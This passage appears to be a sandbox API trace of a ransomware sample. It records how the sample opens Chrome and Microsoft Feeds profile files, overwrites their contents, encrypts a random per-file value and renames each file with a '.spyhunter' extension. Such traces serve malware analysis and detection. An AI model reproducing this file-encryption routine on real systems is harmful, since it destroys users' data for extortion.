HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at work~.feed-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0156.471] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms") returned 107 [0156.471] StrStrW (lpFirst="Microsoft at Work~.feed-ms", lpSrch=".txt") returned 0x0 [0156.471] GetProcessHeap () returned 0x2c0000 [0156.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0156.472] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270eb1c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270eb1c*=0x2800, lpOverlapped=0x0) returned 1 [0156.518] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.518] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270eb1c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270eb1c*=0x2800, lpOverlapped=0x0) returned 1 [0156.518] GetProcessHeap () returned 0x2c0000 [0156.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0156.518] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.519] WriteFile (in: hFile=0xb0, lpBuffer=0x270eb5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270eb1c, lpOverlapped=0x0 | out: lpBuffer=0x270eb5c*, lpNumberOfBytesWritten=0x270eb1c*=0x4, lpOverlapped=0x0) returned 1 [0156.519] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270eb1c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x270eb1c*=0x30, lpOverlapped=0x0) returned 1 [0156.519] CloseHandle (hObject=0xb0) returned 1 [0156.519] GetProcessHeap () returned 0x2c0000 [0156.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0156.519] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms.spyhunter") returned 117 [0156.519] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at work~.feed-ms"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at work~.feed-ms.spyhunter")) returned 1 [0156.520] GetProcessHeap () returned 0x2c0000 [0156.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0156.520] GetProcessHeap () returned 0x2c0000 [0156.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0156.520] GetProcessHeap () returned 0x2c0000 [0156.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4a698 | out: hHeap=0x2c0000) returned 1 [0156.520] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eb58 | out: pbBuffer=0x270eb58) returned 1 [0156.521] GetProcessHeap () returned 0x2c0000 [0156.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0156.521] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270eb50*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270eb50*=0x30) returned 1 [0156.521] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\readme"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0156.521] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\README") returned 86 [0156.522] StrStrW (lpFirst="README", lpSrch=".txt") returned 0x0 [0156.522] GetProcessHeap () returned 0x2c0000 [0156.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0156.522] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270eb14, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270eb14*=0xb4, lpOverlapped=0x0) returned 1 [0156.522] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffff4c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.522] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xb4, lpNumberOfBytesWritten=0x270eb14, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270eb14*=0xb4, lpOverlapped=0x0) returned 1 [0156.523] GetProcessHeap () returned 0x2c0000 [0156.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0156.523] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.523] WriteFile (in: hFile=0xb0, lpBuffer=0x270eb54*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270eb14, lpOverlapped=0x0 | out: lpBuffer=0x270eb54*, lpNumberOfBytesWritten=0x270eb14*=0x4, lpOverlapped=0x0) returned 1 [0156.523] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270eb14, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x270eb14*=0x30, lpOverlapped=0x0) returned 1 [0156.523] CloseHandle (hObject=0xb0) returned 1 [0156.523] GetProcessHeap () returned 0x2c0000 [0156.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0156.523] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\README.spyhunter") returned 96 [0156.523] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\readme"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\README.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\readme.spyhunter")) returned 1 [0156.532] GetProcessHeap () returned 0x2c0000 [0156.532] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0156.532] GetProcessHeap () returned 0x2c0000 [0156.532] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0156.532] GetProcessHeap () returned 0x2c0000 [0156.532] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f38d50 | out: hHeap=0x2c0000) returned 1 [0156.533] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eb58 | out: pbBuffer=0x270eb58) returned 1 [0156.533] GetProcessHeap () returned 0x2c0000 [0156.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0156.533] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270eb50*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270eb50*=0x30) returned 1 [0156.533] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\previews_opt_out.db-journal"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0156.533] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db-journal") returned 107 [0156.533] StrStrW (lpFirst="previews_opt_out.db-journal", lpSrch=".txt") returned 0x0 [0156.533] GetProcessHeap () returned 0x2c0000 [0156.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0156.533] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270eb14, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270eb14*=0x0, lpOverlapped=0x0) returned 1 [0156.533] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.534] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x270eb14, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270eb14*=0x0, lpOverlapped=0x0) returned 1 [0156.534] GetProcessHeap () returned 0x2c0000 [0156.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0156.534] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.534] WriteFile (in: hFile=0xb0, lpBuffer=0x270eb54*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270eb14, lpOverlapped=0x0 | out: lpBuffer=0x270eb54*, lpNumberOfBytesWritten=0x270eb14*=0x4, lpOverlapped=0x0) returned 1 [0156.539] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270eb14, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x270eb14*=0x30, lpOverlapped=0x0) returned 1 [0156.539] CloseHandle (hObject=0xb0) returned 1 [0156.539] GetProcessHeap () returned 0x2c0000 [0156.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0156.539] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db-journal.spyhunter") returned 117 [0156.539] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\previews_opt_out.db-journal"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db-journal.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\previews_opt_out.db-journal.spyhunter")) returned 1 [0156.540] GetProcessHeap () returned 0x2c0000 [0156.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0156.540] GetProcessHeap () returned 0x2c0000 [0156.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0156.540] GetProcessHeap () returned 0x2c0000 [0156.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbbcd8 | out: hHeap=0x2c0000) returned 1 [0156.540] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eb50 | out: pbBuffer=0x270eb50) returned 1 [0156.540] GetProcessHeap () returned 0x2c0000 [0156.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0156.540] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270eb48*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270eb48*=0x30) returned 1 [0156.541] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\previews_opt_out.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0156.541] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db") returned 99 [0156.541] StrStrW (lpFirst="previews_opt_out.db", lpSrch=".txt") returned 0x0 [0156.541] GetProcessHeap () returned 0x2c0000 [0156.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0156.541] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270eb0c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270eb0c*=0x2800, lpOverlapped=0x0) returned 1 [0156.552] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.552] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270eb0c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270eb0c*=0x2800, lpOverlapped=0x0) returned 1 [0156.552] GetProcessHeap () returned 0x2c0000 [0156.552] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0156.552] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.552] WriteFile (in: hFile=0xb0, lpBuffer=0x270eb4c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270eb0c, lpOverlapped=0x0 | out: lpBuffer=0x270eb4c*, lpNumberOfBytesWritten=0x270eb0c*=0x4, lpOverlapped=0x0) returned 1 [0156.553] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270eb0c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x270eb0c*=0x30, lpOverlapped=0x0) returned 1 [0156.553] CloseHandle (hObject=0xb0) returned 1 [0156.553] GetProcessHeap () returned 0x2c0000 [0156.553] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0156.553] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db.spyhunter") returned 109 [0156.553] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\previews_opt_out.db"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\previews_opt_out.db.spyhunter")) returned 1 [0156.554] GetProcessHeap () returned 0x2c0000 [0156.554] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0156.554] GetProcessHeap () returned 0x2c0000 [0156.554] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0156.554] GetProcessHeap () returned 0x2c0000 [0156.554] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f29ae8 | out: hHeap=0x2c0000) returned 1 [0156.554] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eb50 | out: pbBuffer=0x270eb50) returned 1 [0156.554] GetProcessHeap () returned 0x2c0000 [0156.554] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0156.554] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270eb48*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270eb48*=0x30) returned 1 [0156.554] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Persistent State" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\network persistent state"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0156.555] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Persistent State") returned 104 [0156.555] StrStrW (lpFirst="Network Persistent State", lpSrch=".txt") returned 0x0 [0156.555] GetProcessHeap () returned 0x2c0000 [0156.555] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0156.555] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270eb0c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270eb0c*=0x28, lpOverlapped=0x0) returned 1 [0156.556] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffffd8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.556] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x270eb0c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270eb0c*=0x28, lpOverlapped=0x0) returned 1 [0156.556] GetProcessHeap () returned 0x2c0000 [0156.556] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0156.556] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.556] WriteFile (in: hFile=0xb0, lpBuffer=0x270eb4c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270eb0c, lpOverlapped=0x0 | out: lpBuffer=0x270eb4c*, lpNumberOfBytesWritten=0x270eb0c*=0x4, lpOverlapped=0x0) returned 1 [0156.556] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270eb0c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x270eb0c*=0x30, lpOverlapped=0x0) returned 1 [0156.556] CloseHandle (hObject=0xb0) returned 1 [0156.556] GetProcessHeap () returned 0x2c0000 [0156.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0156.557] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Persistent State.spyhunter") returned 114 [0156.557] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Persistent State" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\network persistent state"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Persistent State.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\network persistent state.spyhunter")) returned 1 [0156.557] GetProcessHeap () returned 0x2c0000 [0156.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0156.558] GetProcessHeap () returned 0x2c0000 [0156.560] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0156.560] GetProcessHeap () returned 0x2c0000 [0156.560] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4ab38 | out: hHeap=0x2c0000) returned 1 [0156.560] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eb48 | out: pbBuffer=0x270eb48) returned 1 [0156.560] GetProcessHeap () returned 0x2c0000 [0156.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0156.560] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270eb40*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270eb40*=0x30) returned 1 [0156.561] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Action Predictor-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\network action predictor-journal"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0156.561] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Action Predictor-journal") returned 112 [0156.561] StrStrW (lpFirst="Network Action Predictor-journal", lpSrch=".txt") returned 0x0 [0156.561] GetProcessHeap () returned 0x2c0000 [0156.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0156.561] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270eb04, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270eb04*=0x0, lpOverlapped=0x0) returned 1 [0156.561] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.561] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x270eb04, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270eb04*=0x0, lpOverlapped=0x0) returned 1 [0156.561] GetProcessHeap () returned 0x2c0000 [0156.562] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0156.562] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.562] WriteFile (in: hFile=0xb0, lpBuffer=0x270eb44*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270eb04, lpOverlapped=0x0 | out: lpBuffer=0x270eb44*, lpNumberOfBytesWritten=0x270eb04*=0x4, lpOverlapped=0x0) returned 1 [0156.562] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270eb04, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x270eb04*=0x30, lpOverlapped=0x0) returned 1 [0156.562] CloseHandle (hObject=0xb0) returned 1 [0156.563] GetProcessHeap () returned 0x2c0000 [0156.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0156.563] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Action Predictor-journal.spyhunter") returned 122 [0156.563] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Action Predictor-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\network action predictor-journal"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Action Predictor-journal.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\network action predictor-journal.spyhunter")) returned 1 [0156.563] GetProcessHeap () returned 0x2c0000 [0156.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0156.564] GetProcessHeap () returned 0x2c0000 [0156.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0156.564] GetProcessHeap () returned 0x2c0000 [0156.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f47958 | out: hHeap=0x2c0000) returned 1 [0156.564] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eb48 | out: pbBuffer=0x270eb48) returned 1 [0156.564] GetProcessHeap () returned 0x2c0000 [0156.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0156.564] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270eb40*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270eb40*=0x30) returned 1 [0156.564] 